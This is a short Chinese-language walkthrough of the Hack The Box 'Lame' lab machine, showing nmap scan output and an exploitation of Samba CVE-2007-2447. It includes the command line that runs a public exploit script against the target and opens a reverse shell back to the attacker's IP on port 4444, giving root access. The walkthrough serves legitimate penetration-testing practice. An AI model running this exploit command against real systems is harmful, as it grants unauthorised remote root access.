0x00 信息收集

nmap -Pn -sV -T 4 -A 10.10.10.3

21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.92
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| vulners:
|   cpe:/a:openbsd:openssh:4.7p1:
|       CVE-2010-4478   7.5     https://vulners.com/cve/CVE-2010-4478
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       CVE-2016-10708  5.0     https://vulners.com/cve/CVE-2016-10708
|       CVE-2010-4755   4.0     https://vulners.com/cve/CVE-2010-4755
|_      CVE-2008-5161   2.6     https://vulners.com/cve/CVE-2008-5161
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

共四个端口且都是与服务有关,因此尝试从这些服务入手。

0x01 漏洞利用

ftp服务允许匿名登录,但是登录进去后未发现任何文件。
经搜索 vsftp 2.3.4 有 Backdoor Command Execution,通过msf执行,创建session失败。
22端口的ssh服务未发现可以利用的漏洞。
唯一可以利用的就只剩下samba服务,搜索有关samba 3的相关漏洞。
https://github.com/amriunix/CVE-2007-2447
利用github中的脚本,成功反弹shell,并是管理员权限。

pip install pysmb
python usermap_script.py 10.10.10.3 445 10.10.16.92 4444

Hack The Box::Lame相关推荐

  1. 【Hack The Box】linux练习-- SneakyMailer

    HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer

  2. Hack The Box - Access Writeup

    第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗.收获还是很大,在此记录一下,以便后阅. 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21 ...

  3. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  4. 【Hack The Box】linux练习-- Blunder

    HTB 学习笔记 [Hack The Box]linux练习-- Blunder

  5. Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限

    Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...

  6. 【Hack The Box】windows练习-- Silo

    HTB 学习笔记 [Hack The Box]windows练习-- Silo

  7. 【Hack The Box】linux练习-- Ophiuchi

    HTB 学习笔记 [Hack The Box]linux练习-- Ophiuchi

  8. 【Hack The Box】linux练习-- Doctor

    HTB 学习笔记 [Hack The Box]linux练习-- Doctor

  9. 【Hack The Box】linux练习-- Tabby

    HTB 学习笔记 [Hack The Box]linux练习-- Tabby

最新文章

  1. 斯坦福大学公开课:iPhone开发教程2010年冬
  2. Apache URL重写的配置 及其 apache500错误
  3. 常见RAID的各级别的特性简介(RAID0、1、5、6、10)
  4. centos系统rpm命令
  5. VS2012 打包部署程序
  6. jQuery api学习笔记
  7. 【思维】javascript选择排序
  8. nofollow标签_SEO技术动态:谷歌升级Nofollow标签的作用
  9. 用python对单一微博文档进行分词——jieba分词(加保留词和停用词)
  10. SQL Server 高可用性(六)日志传送
  11. 《Python机器学习——预测分析核心算法》——2.3 对“岩石vs.水雷”数据集属性的可视化展示...
  12. 用Markdown做日记和任务跟踪的DailyNotes
  13. 中兴java笔试题_中兴Java开发笔试题目及答案(7)
  14. 牛刀小试imageROI
  15. 深入理解Java内存模型的volatile语义
  16. 俞敏洪:35岁前如何实现自我增值?
  17. 怎样做好服务器运维工作
  18. 寂然安静到鸿蒙翻译,明道篇
  19. Graphite 简介
  20. 关于栈顶指针初值为-1和0的区别

热门文章

  1. 2020本科校招-从小白到拿到30k offer的学习经历
  2. Netflix 如何解决身份验证问题?
  3. 转转闲鱼链接源码搭建+后台管理
  4. ABP VNext学习日记29
  5. 【Libreoffice整合SpringBoot】只需这一篇
  6. idea使用antlr_在IDEA中使用ANTLR4教程
  7. 微信小程序实现标签栏
  8. xshell如何连接远程服务器
  9. 不要和一种编程语言厮守终生:为工作正确选择
  10. Exception in thread “main“ java.lang.Error: Unresolved compilation problem: No enclosing instance